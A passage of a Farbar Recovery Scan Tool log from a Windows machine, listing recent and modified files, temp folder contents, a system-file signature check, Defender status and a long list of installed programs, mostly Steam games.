C:\Windows\SysWOW64\urlmon.dll2014-10-29 19:50 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll2014-10-29 19:50 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl2014-10-29 19:50 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll2014-10-29 19:50 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe2014-10-29 19:50 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll2014-10-29 19:50 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb2014-10-29 19:50 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe2014-10-29 19:50 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll2014-10-29 19:49 - 2014-09-19 18:54 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll2014-10-29 19:49 - 2014-09-19 18:48 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll2014-10-29 19:49 - 2014-09-19 18:47 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll2014-10-29 19:49 - 2014-09-19 18:46 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe2014-10-29 19:49 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll2014-10-29 19:49 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll2014-10-29 19:49 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe2014-10-29 19:49 - 2013-08-27 04:01 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll2014-10-29 19:49 - 2013-08-27 04:01 - 01143296 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll2014-10-29 19:49 - 2013-08-27 03:21 - 01077760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll2014-10-17 00:53 - 2014-10-17 00:53 - 00000000 ____D () C:\Users\Calahan\Downloads\Lower shadow map mod V42014-10-17 00:50 - 2014-10-17 00:50 - 00013020 _____ () C:\Users\Calahan\Downloads\Lower shadow map mod V4.pdmod2014-10-16 23:07 - 2014-10-16 23:07 - 00000000 ____D () C:\Users\Calahan\AppData\Local\PAYDAY2014-10-16 02:39 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-10-16 02:39 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll2014-10-16 02:39 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-10-16 02:39 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-10-16 02:39 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll2014-10-16 02:39 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll2014-10-16 02:38 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll2014-10-16 02:38 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll2014-10-16 02:38 - 2014-08-28 21:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll2014-10-16 02:38 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll2014-10-16 02:38 - 2014-08-28 21:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll2014-10-16 02:38 - 2014-08-28 21:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll2014-10-16 02:38 - 2014-08-28 21:06 - 01125888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe2014-10-16 02:38 - 2014-08-28 20:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll2014-10-16 02:38 - 2014-08-28 20:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe2014-10-16 02:38 - 2014-08-28 20:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll2014-10-16 02:38 - 2014-08-28 20:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll2014-10-16 02:37 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll2014-10-16 02:37 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll2014-10-16 02:37 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll2014-10-16 02:37 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe2014-10-16 02:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll2014-10-16 02:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll2014-10-16 02:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll2014-10-16 02:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll2014-10-16 02:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys2014-10-16 02:37 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers \tssecsrv.sys2014-10-15 18:51 - 2014-10-15 18:52 - 00863820 _____ () C:\Users\Calahan\Downloads\Nosferatu.7z2014-10-12 01:05 - 2014-10-12 01:05 - 00000000 ____D () C:\Users\Calahan\AppData\Local\IsolatedStorage ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-10 22:45 - 2013-09-17 13:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-11-10 22:25 - 2013-09-18 10:42 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2014-11-10 20:54 - 2011-05-31 15:30 - 00001945 _____ () C:\Windows\epplauncher.mif2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327- 5P-1.C7483456-A289-439d-8115-601632D005A02014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327- 5P-0.C7483456-A289-439d-8115-601632D005A02014-11-10 20:25 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI2014-11-10 20:24 - 2011-05-26 18:45 - 01295483 _____ () C:\Windows\WindowsUpdate.log2014-11-10 20:21 - 2014-06-28 01:20 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Raptr2014-11-10 20:18 - 2013-09-18 10:42 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2014-11-10 20:18 - 2011-05-26 19:15 - 00485104 _____ () C:\Windows\PFRO.log2014-11-10 20:18 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-11-10 20:18 - 2009-07-13 23:51 - 00057091 _____ () C:\Windows\setupact.log2014-11-10 20:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Resources2014-11-10 19:28 - 2013-12-30 18:00 - 00000000 ____D () C:\Program Files (x86)\Steam2014-11-10 19:11 - 2014-06-25 17:33 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Skype2014-11-10 18:53 - 2014-02-28 16:31 - 00000000 ____D () C:\Users\Calahan\AppData\Local\CrashDumps2014-11-04 16:36 - 2014-02-28 16:37 - 00000000 ____D () C:\Users\Calahan\Documents\My Games2014-11-04 16:36 - 2014-02-28 16:23 - 00545972 _____ () C:\Windows\DirectX.log2014-11-04 15:59 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games2014-11-02 23:25 - 2014-06-30 17:19 - 00000000 ____D () C:\Program Files (x86)\Overwolf2014-10-30 21:35 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache2014-10-30 18:18 - 2014-06-30 17:18 - 00000000 ____D () C:\Users\Calahan\AppData\Local\Overwolf2014-10-30 06:25 - 2011-05-26 16:47 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\zh-HK2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions2014-10-29 11:26 - 2013-09-18 10:43 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk2014-10-21 12:20 - 2013-09-18 10:42 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA2014-10-21 12:20 - 2013-09-18 10:42 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore2014-10-20 22:58 - 2014-10-07 22:24 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Mount&Blade With Fire and Sword2014-10-20 15:02 - 2014-06-27 21:05 - 00000000 ____D () C:\Users\Calahan\Downloads\pdmod_tool_v1.15_fix12014-10-17 03:50 - 2009-07-13 23:45 - 00416704 _____ () C:\Windows\system32\FNTCACHE.DAT2014-10-17 03:50 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs \Accessories2014-10-17 03:48 - 2014-05-15 02:26 - 00000000 ___SD () C:\Windows\system32\CompatTel2014-10-17 02:19 - 2011-05-26 17:08 - 00000000 ____D () C:\ProgramData\Microsoft Help2014-10-17 02:14 - 2013-09-17 12:32 - 00000000 ____D () C:\Windows\system32\MRT2014-10-17 02:00 - 2011-05-31 15:31 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe2014-10-15 18:06 - 2009-07-14 00:08 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT Some content of TEMP:====================C:\Users\administrator\AppData\Local\Temp\ApnStub.exeC:\Users\administrator\AppData\Local\Temp\HPHASUtil.exeC:\Users\administrator\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exeC:\Users\administrator\AppData\Local\Temp\MSN874A.exeC:\Users\administrator\AppData\Local\Temp\uninstall.exeC:\Users\administrator\AppData\Local\Temp\UninstallHPTCA.exeC:\Users\Administrator.cvci20462\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exeC:\Users\Calahan\AppData\Local\Temp\raptrpatch.exeC:\Users\Calahan\AppData\Local\Temp\raptr_stub.exeC:\Users\Calahan\AppData\Local\Temp\SkypeSetup.exeC:\Users\Calahan\AppData\Local\Temp\stuprt.exeC:\Users\Calahan\AppData\Local\Temp\xmlUpdater.exeC:\Users\Logan\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\appupdater-{835E6293-B3C4-B247-9C49-3213713F7FC7}.exeC:\Users\Mike2\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signedC:\Windows\System32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\System32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\System32\services.exe => File is digitally signedC:\Windows\System32\User32.dll => File is digitally signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\System32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\System32\rpcss.dll => File is digitally signedC:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-26 09:18 ==================== End Of Log ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014Ran by Calahan at 2014-11-10 22:58:19Running from C:\Users\Calahan\DownloadsBoot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 0RBITALIS (HKLM-x32\...\Steam App 278440) (Version: - Alan Zucconi)140 (HKLM-x32\...\Steam App 242820) (Version: - Carlsen Games)3079 -- Block Action RPG (HKLM-x32\...\Steam App 259620) (Version: - Phr00t's Software)3089 -- Futuristic Action RPG (HKLM-x32\...\Steam App 263360) (Version: - Phr00t's Software)6180 the moon (HKLM-x32\...\Steam App 299660) (Version: - Turtle Cream)64 Bit HP CIO Components Installer (Version: 7.2.5 - Hewlett-Packard) Hidden7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)7-Zip 9.22beta (HKLM-x32\...\7-Zip) (Version: - )8BitMMO (HKLM-x32\...\Steam App 250420) (Version: - Archive Entertainment)A Wizard's Lizard (HKLM-x32\...\Steam App 280040) (Version: - Lost Decade Games)Actify SpinFire 9.0 (HKLM-x32\...\Actify SpinFire 9.0) (Version: 11.0.1435.1507.3 - Actify, Inc.)Actify SpinFire 9.0 (x32 Version: 11.0.1435.1507.3 - Actify Inc) HiddenActivClient x64 (HKLM\...\{86E45973-5352-439F-A115-2E8EE4D40140}) (Version: 6.2 - ActivIdentity)Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)Alan Wake (HKLM-x32\...\Steam App 108710) (Version: - Remedy Entertainment)AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)Another World (HKLM-x32\...\Steam App 233550) (Version: - Eric Chahi)Anzio Lite 12.6 (HKLM-x32\...\{1F938630-5205-4C8C-81EA-D9ECFC8CA507}) (Version: - )ATI Problem Report Wizard (Version: 3.0.750.0 - ATI Technologies) HiddenAwesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)Bastion (HKLM-x32\...\Steam App 107100) (Version: - Supergiant Games)Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)Breach & Clear (HKLM-x32\...\Steam App 266130) (Version: - Mighty Rabbit Studios)calibre (HKLM-x32\...\{D0940326-79BF-4D05-98CA-ED208661D34B}) (Version: 1.19.0 - Kovid Goyal)CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) HiddenCaribbean! (HKLM-x32\...\Steam App 293010) (Version: - Snowbird Games)Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version: - FromSoftware)DARK SOULS™ II (HKLM-x32\...\Steam App 236430) (Version: - FromSoftware, Inc)Darwinia (HKLM-x32\...\Steam App 1500) (Version: - Introversion Software)DriverTuner 3.5.0.1 (HKLM-x32\...\{520C1D80-935C-42B9-9340-E883849D804F}_is1) (Version: 3.5.0.1 - LionSea Software co., ltd)erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) HiddenFAHClient (HKLM-x32\...\FAHClient) (Version: 7.3.6 - Stanford University)Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)FileZilla Client 3.5.2 (HKLM-x32\...\FileZilla Client) (Version: 3.5.2 - FileZilla Project)Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) HiddenGunpoint (HKLM-x32\...\Steam App 206190) (Version: - Suspicious Developments)Hack 'n' Slash (HKLM-x32\...\Steam App 246070) (Version: - Double Fine Productions)Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - )Hero of Many (HKLM-x32\...\Steam App 297370) (Version: - Trickster Arts)Hotline Miami (HKLM-x32\...\Steam App 219150) (Version: - Dennaton Games)HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) HiddenImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.7.0 - LIGHTNING UK!)Infested Planet (HKLM-x32\...\Steam App 204530) (Version: - Rocket Bear Games)Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)Intel® Network Connections 14.6.10.0 (HKLM\...\PROSetDX) (Version: 14.6.10.0 - Intel)Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.600 - Oracle)Jazzpunk (HKLM-x32\...\Steam App 250260) (Version: - Necrophone Games)Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version: - Squad)Khet 2.0 (HKLM-x32\...\Steam App 312720) (Version: - BlueLine Games)Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)Kinetic Void (HKLM-x32\...\Steam App 227160) (Version: - Badland Studio)Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)LYNE (HKLM-x32\...\Steam App 266010) (Version: - Thomas Bowker)Magicka (HKLM-x32\...\Steam App 42910) (Version: - Arrowhead Game Studios)Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)Max Payne 2: The Fall of Max Payne (HKLM-x32\...\Steam App 12150) (Version: - Remedy Entertainment)Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)Microsoft Project Professional 2010 (HKLM-x32\...\Office14.PRJPRO) (Version: 14.0.7015.1000 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)Microsoft Visio Professional 2010 (HKLM-x32\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)Mini Metro (HKLM-x32\...\Steam App 287980) (Version: - Dinosaur Polo Club)Monaco (HKLM-x32\...\Steam App 113020) (Version: - Pocketwatch Games)Mount & Blade: Warband (HKLM-x32\...\Steam App 48700) (Version: - TaleWorlds Entertainment)Mount & Blade: With Fire and Sword (HKLM-x32\...\Steam App 48720) (Version: - TaleWorlds Entertainment)MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)Multiwinia (HKLM-x32\...\Steam App 1530) (Version: - Introversion Software)Nidhogg (HKLM-x32\...\Steam App 94400) (Version: - Messhof)Nosferatu: The Wrath of Malachi (HKLM-x32\...\Steam App 283290) (Version: - Idol FX)Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.7 - )NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)OpenAL (HKLM-x32\...\OpenAL) (Version: - )Overwolf (HKLM-x32\...\Overwolf) (Version: 0.81.34.0 - Overwolf Ltd.)PANTECH Handset USB Driver (HKLM\...\{B9676D15-E0EC-42c2-8C16-F3D9648C44AF}) (Version: 1.1.4580.1215 - PANTECH CO,.LTD)Pantech PCSuite (HKLM-x32\...\{69187EC5-F5CF-4B2C-B920-5A17F44D9685}) (Version: 1.0 - Pantech)Pantech PCSuite (x32 Version: 1.0 - Pantech) HiddenPapers, Please (HKLM-x32\...\Steam App 239030) (Version: - 3909)PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version: - OVERKILL Software)PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.5.1 - Frank Heindörfer, Philip Chinery)Plantronics® GameCom 780 Software for Dolby® Headphone (HKLM-x32\...\{EB3C9064-9140-4279-9E51-965119402151}) (Version: 1.00.0001 - Plantronics)Prison Architect (HKLM-x32\...\Steam App 233450) (Version: - Introversion Software)Prototype (HKLM-x32\...\Steam App 10150) (Version: - Radical Entertainment)PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)Quake III Arena (HKLM-x32\...\Steam App 2200) (Version: - id Software)Raptr (HKLM-x32\...\Raptr) (Version: - )Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)Receiver (HKLM-x32\...\Steam App 234190) (Version: - Wolfire Games)Return to Castle Wolfenstein (HKLM-x32\...\Steam App 9010) (Version: - Gray Matter Studios)Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )Rogue Shooter: The FPS Roguelike (HKLM-x32\...\Steam App 295770) (Version: - Hippomancer)RollerCoaster Tycoon 2: Triple Thrill Pack (HKLM-x32\...\Steam App 285330) (Version: - Chris Sawyer Productions)RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version: - Frontier)RUNNING WITH RIFLES (HKLM-x32\...\Steam App 270150) (Version: - Modulaatio Games)Safecracker: The Ultimate Puzzle Adventure (HKLM-x32\...\Steam App 3260) (Version: - Kheops Studio)Sang-Froid - Tales of Werewolves 